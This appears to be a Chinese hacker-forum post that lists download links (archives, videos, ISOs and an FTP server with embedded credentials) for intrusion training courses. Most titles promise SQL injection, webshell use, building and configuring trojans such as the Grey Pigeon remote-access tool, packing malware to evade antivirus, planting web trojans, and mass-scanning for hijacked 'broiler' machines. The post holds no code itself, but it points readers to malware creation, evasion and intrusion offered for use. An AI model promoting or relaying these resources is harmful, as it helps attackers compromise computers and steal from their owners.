http://down.sec120.com/chenshisan/[军团VIP光盘BB005]第八军团入门系列课程2SQL注射入门技术精讲.rar http://down.sec120.com/chenshisan/[军团VIP光盘BB006]第八军团入门系列课程3webshell入门技术精讲.rar http://down.sec120.com/chenshisan/[军团VIP光盘BB007]第八军团入门系列课程4网站安全检测入门技术精讲.rar http://down.sec120.com/chenshisan/[军团VIP光盘BB008]第八军团入门系列课程5网站安全检测高级技术精讲.rar http://down.sec120.com/chenshisan/[军团VIP光盘BB009]第八军团入门系列课程6google搜索国外网站技术精讲.rar http://down.sec120.com/chenshisan/[军团VIP光盘BB010]第八军团入门系列课程706040溢出漏洞技术精讲.rar 国鹰派联盟真正的黑客站做的东东 第一期: http://radio.neteasy.cn/rmdemo/2005/ceus20050127.rm 第二期: http://radio.neteasy.cn/rmdemo/2005/ceus20050202.rm 第三期: http://radio.neteasy.cn/rmdemo/2005/ceus20050317.rm 第四期: http://radio.neteasy.cn/rmdemo/2005/ceus20050331.rm 第五期: http://radio.neteasy.cn/rmdemo/2005/ceus20050512.rm 第六期: http://radio.neteasy.cn/rmdemo/2005/ceus20051106.rm 第七期: 由于中途断电,所以只有从技术部分开始的录音,请大家见谅。 http://radio.neteasy.cn/rmdemo/2005/ceus20051120.rm 第八期: http://radio.neteasy.cn/rmdemo/2005/ceus20051204.rm 第九期: http://radio.neteasy.cn/rmdemo/2005/ceus20051218.rm 第十期: http://radio.neteasy.cn/rmdemo/2005/ceus20060101.rm 第1章 认识注册表 1.1 http://cimg.163.com/tech/netSchool/juyi/windows/11.swf什么是注册表 1.2 http://cimg.163.com/tech/netSchool/juyi/windows/12.swf怎样访问注册表 1.3 http://cimg.163.com/tech/netSchool/juyi/windows/13.swf注册表的界面 1.4 http://cimg.163.com/tech/netSchool/juyi/windows/14.swf注册表的基本结构 1.5 http://cimg.163.com/tech/netSchool/juyi/windows/15.swf注册表文件的结构 安全软件/剑鹰1 ftp://free:free@218.93.192.213/安全软件/剑鹰1-4辑/CNSE_DISK_1.ISO 安全软件/剑鹰2 ftp://free:free@218.93.192.213/安全软件/剑鹰1-4辑/Cnse_Disk_2.ISO 安全软件/剑鹰3 ftp://free:free@218.93.192.213/安全软件/剑鹰1-4辑/Cnse_Disk_3.ISO 安全软件/剑鹰4 ftp://free:free@218.93.192.213/安全软件/剑鹰1-4辑/Cnse_Disk_4.ISO 黑鹰木马免杀进阶班课程 -------------------------------------------------------------------------------- 黑鹰免杀进阶班课程全部课程(部分1) ftp://211.137.118.35/ com1/ for www.cmbfree.com/ by yujian/pub/黑鹰免杀进级班--1-PE结构篇.rar ftp://211.137.118.35/ com1/ for www.cmbfree.com/ by yujian/pub/黑鹰免杀进级班--1-PE结构篇.rar ADSL超频奇兵 V4.7(加速网速)--- http://bbs.cmbfree.com/read.php?tid=6232&toread=1 黑客必杀技演示 http://download.chinaitlab.com/soft/10690.htm 用NC来实现内网反弹入侵的动画教程 http://download.chinaitlab.com/soft/10974.htm 超级入侵之各种服务开启 http://download.chinaitlab.com/soft/10971.htm 利用PHP程序入侵 http://download.chinaitlab.com/soft/10961.htm 流入方法与高难度管理入口猜测 Hhttp://download.chinaitlab.com/soft/10647.htm 利用远程IIS默认文件查看系统文件 http://download.chinaitlab.com/soft/10648.htm 标准的SA口令入侵步骤 http://download.chinaitlab.com/soft/10959.htm 利用ASP后门木马入侵网站 http://download.chinaitlab.com/soft/10956.htm 新人入侵常见问题及WEB防范措施基础 http://download.chinaitlab.com/soft/10720.htm 上传ASP木马入侵网站教程 http://download.chinaitlab.com/soft/10716.htm 快速有效的入侵站点 http://download.chinaitlab.com/soft/10710.htm 教菜鸟初步入侵法 http://download.chinaitlab.com/soft/10708.htm 4899入侵网吧主机教程 http://download.chinaitlab.com/soft/10684.htm 侵电脑就这么简单(网页入侵电脑) http://download.chinaitlab.com/soft/10632.htm 菜菜鸟入侵两种网站方法 http://download.chinaitlab.com/soft/10631.htm 如何抢黑友的WEBSHELL http://download.chinaitlab.com/soft/11008.htm BBSXP 漏洞综合利用 http://download.chinaitlab.com/soft/10645.htm 利用BT狂扫肉鸡--菜鸟篇 http://download.chinaitlab.com/soft/10979.htm 最新漏洞得到肉鸡 http://download.chinaitlab.com/soft/10683.htm 让BMP老网马起死回生 http://download.chinaitlab.com/soft/10972.htm 利用Serv-u的标识找肉鸡 http://download.chinaitlab.com/soft/10963.htm 傻瓜式找肉鸡 http://download.chinaitlab.com/soft/10960.htm 世界肉鸡任我扫 http://download.chinaitlab.com/soft/10718.htm Guest用户攻与防 http://download.chinaitlab.com/soft/10686.htm 让别人的木马为我们服务 http://download.chinaitlab.com/soft/11004.htm DOS下关闭木马后门病毒端口使用教程 thttp://download.chinaitlab.com/soft/10990.htm 藏ASP木马终极技巧 http://download.chinaitlab.com/soft/10989.htm 防PHP木马 http://download.chinaitlab.com/soft/10986.htm 大家都来做新型木马 http://download.chinaitlab.com/soft/10987.html 被动防御反弹木马比特论坛http://download.chinaitlab.com/soft/10970.htm 终身免杀穿SP2网页木马 http://download.chinaitlab.com/soft/10968.htm 制作免杀木马 http://download.chinaitlab.com/soft/10723.htm 让木马、病毒免杀的无敌文件夹 Q http://download.chinaitlab.com/soft/10715.htm 木马配置终极版 http://download.chinaitlab.com/soft/10713.htm 防止ASP木马的运行 http://download.chinaitlab.com/soft/10701.htm 爆破木马克星 http://download.chinaitlab.com/soft/10693.htm 配置自己木马教程 http://download.chinaitlab.com/soft/10689.htm Discuz!,Board,Comsenz,foru编写制作木马捆绑机 http://download.chinaitlab.com/soft/10652.htm 网页木马制作与挂马 http://download.chinaitlab.com/soft/10642.htm 国外bifrost木马配置动画 http://download.chinaitlab.com/soft/10637.htm 简单识别木马 http://download.chinaitlab.com/soft/10638.htm 最新SP2网页木马制作全过程 http://download.chinaitlab.com/soft/10630.htm 制作免杀灰鸽子 http://download.chinaitlab.com/soft/11013.htm 灰鸽子配置全教程 http://download.chinaitlab.com/soft/10983.htm 灰鸽子内网FTP上线加配置最新服务端 http://download.chinaitlab.com/soft/10705.htm 给灰鸽子加壳躲避杀毒软件查杀 http://download.chinaitlab.com/soft/10702.htm 另类JS挂马 http://download.chinaitlab.com/soft/10636.htm 全套挂马教程 http://download.chinaitlab.com/soft/10955.htm 灰鸽子破解器正式版动画 http://download.chinaitlab.com/soft/10981.htm 破解动画密码教程 http://download.chinaitlab.com/soft/11001.htm 破解Linux3l http://download.chinaitlab.com/soft/11000.htm [/sell]
-------------本文结束期待您的评论-------------